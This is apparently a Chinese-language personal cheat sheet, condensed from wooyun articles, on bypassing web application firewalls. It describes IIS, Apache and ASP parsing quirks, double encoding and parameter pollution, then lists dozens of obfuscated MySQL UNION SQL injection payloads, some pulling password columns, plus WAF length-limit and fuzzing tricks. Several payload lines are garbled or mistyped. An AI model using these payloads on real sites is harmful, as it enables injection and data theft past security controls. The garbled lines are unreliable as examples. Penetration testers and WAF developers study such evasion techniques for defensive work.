一、前言

本文整理自wooyun drops上的几篇文章以及自己fuzz出来的一些特征,wooyun文章以《Bypass WAF Cookbook》内容为主体,作者为MayIKissYou,本文是精简过后的内容,主要用于自己平时查询。更详细的内容请参考原文。

一点感悟,所谓bypass的核心就是:寻找用户数据从用户端到最终数据处理端的中间不同节点对数据转换的特性。因为不同节点对数据会有不同的处理方式,而利用这些不同的特性即可以造成bypass,例如数据从客户端发出后,会经过WAF引擎、Web服务器、脚本语言解析器、Web应用程序、数据库,而这里面无论哪一层发现新的特性,都有可能绕过WAF,更多的实例在下文中举出。

二、Web Server层

1. IIS服务器
  • iis环境:
    • %u特性: iis支持对unicode的解析,如:payload为[s%u006c%u0006ect],解析出来后则是[select]
  • iis + asp环境:
    • %特性: asp+iis环境下会忽略掉百分号,如:payload为[sele%ct], 解析出来后则是[select]
    • 另类%u特性: unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现:多个widechar可能会转换为同一个字符。
      如:select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为e。
2. apache服务器
  • 畸形method(header头中)
    某些apache版本在做GET请求的时候,无论method为何值均会取出GET的内容。如请求的method名为DOTA,依然会返回GET方法的值,即,可以任意替换GET方法为其它值,但仍能有效工作,但如果waf严格按照GET方法取值,则取不到任何内容。
  • php+apache畸形的boundary
    php在解析multipart data的时候有自己的特性,对于boundary的识别,只取了逗号前面的内容,例如我们设置的boundary为—-aaaa,123456,php解析的时候只识别了—-aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候,有可能获取的是整个字符串,此时可能就会出现BYPASS。

三、Web应用层

  • 双重URL编码: 即web应用层在接受到经过服务器层解码后的参数后,又进行了一次URL解码。
  • 获取参数的方式
    • 变换请求方式:
      • 在web应用中使用了统一获取参数的方式: 如php里使用$_REQUEST获取参数,但WAF层如果过滤不全则容易bypass,如,waf层过滤了get/post,但没有过滤cookie,而web应用层并不关心参数是否来自cookie
      • urlencode和form-data: POST在提交数据的时候有两种方式,第一种方式是使用urlencode的方式提交,第二种方式是使用form-data的方式提交。当我们在测试的时候,如果发现POST提交的数据被过滤掉了,此时可以考虑使用form-data的方式去提交。
    • 畸形请求方式:
      • asp/asp.net request解析:
        在asp和asp.net中获取用户的提交的参数一般使用request包,当使用request(‘id’)的形式获取包的时候,会出现GET,POST分不清的情况,譬如可以构造一个请求包,METHOD为GET,但是包中还带有POST的内容和POST的content-type, 换一种理解方式也就是将原本的post数据包的method改成GET,如果使用request(‘id’)方式获取数据,仍会获取到post的内容
    • HTTP参数污染:
      • 当WAF获取参数的形式与WEB程序获取参数的形式不一致的时候就可能出现bypass
        asp.net + iis:id=1,2,3
        asp + iis :id=1,2,3
        php + apache :id=3
        jsp + tomcat :id=1

四、数据库层(MySQL)

  • 1. 参数和union之间:
    • \N ==> select from user where id =1\Nunion select from other
    • 浮点数 ==> select from user where id =1.0union select from other
    • 80e ==> select from user where id =80eunion select from other
    • 注释 ==> select from user where id =1/\!50000union*/ select * from other
  • 2. union和select之间:
    • 空白符 ==> %09,%0a,%0b,%0c,%0d,%a0,%0d%0a
    • 注释 ==> select from user where id =1 union/\test*/select * from other
    • 括号 ==> select from user where id =1 union(select from other)
  • 3. select和查询字段之间:
    • 空白符 ==> 同上
    • 注释 ==> 同上
    • 括号 ==> select * from user where id =1 union select(1)from other
    • 运算符 ==> select from user where id =1 union select-1,2,3
      ==> select
      from user where id =1 union select+1,2,3
      ==> select from user where id =1 union select~1,2,3
      ==> select
      from user where id =1 union select!1,2,3
      ==> select from user where id =1 union select@1,2,3
      ==> select
      from user where id =1 union select-1+1.from user
      ==> select from user where id =1 union select@`id`,2,3
      ==> select
      from user where id =1 union select`version`()
      ==> select from user where id =1 union /\!50000select*/1,2,3
    • 单引号 ==> select * from user where id =1 union select’1’,2,3
    • 双引号 ==> select * from user where id =1 union select”1”,2,3
    • 大括号 ==> select * from user where id =1 union select{x 1},2,3
    • \N ==> select * from user where id =1 union select\N,2,3
  • 4. 查询字段和from之间:
    • 空白符 ==> 同上
    • 注释 ==> 同上
    • 浮点数 ==> select from user where id =1 union select 1,2,3.0from uesr
      ==> select
      from user where id =1 union select 1,2,3.from uesr
    • 其它 ==> select from user where id =1 union select`passwd`from uesr
      ==> select
      from user where id =1 union select{x passwd}from uesr
      ==> select from user where id =1 union select(passwd)from uesr
      ==> select
      from user where id =1 union select 1,2,3’’from users
      ==> select * from user where id =1 union select 1,2,3””from users
  • 5.from之后:
    • 空白符 ==> 同上
    • 注释 ==> 同上
    • 其它 ==> select from user where id =1 union select passwd from`uesr`
      ==> select
      from user where id =1 union select passwd/*!50000from*/uesr
      ==> select from user where id =1 union select passwd from{x user}
      ==> select
      from user where id =1 union select passwd from(user)
      ==> select from user where id =1 union select 1,2,id from. users
      ==> select
      from user where id =1 union select 1,2,id from .users

五、WAF层

  • 1. 性能:某些waf为了照顾性能,会将数据包截取一定长度用来检测,但如果发送的请求包数据长度超过waf规定的长度,则不对之后的内容进行检测
  • 2.业务:某些waf为了规避业务上的问题会刻意留下漏洞(属于业务和技术的平衡点的问题,值得挖掘)
  • 3. FUZZ:某些waf可能由于自身的解析问题,对于某些字符解析出错,造成全局bypass
    • fuzz位置:
      get请求处
      header请求处
      post urlencode内容处
      post form-data内容处
    • fuzz内容:
      编码过的0-255字符
      未编码过的0-255字符
      Unicode/GBK字符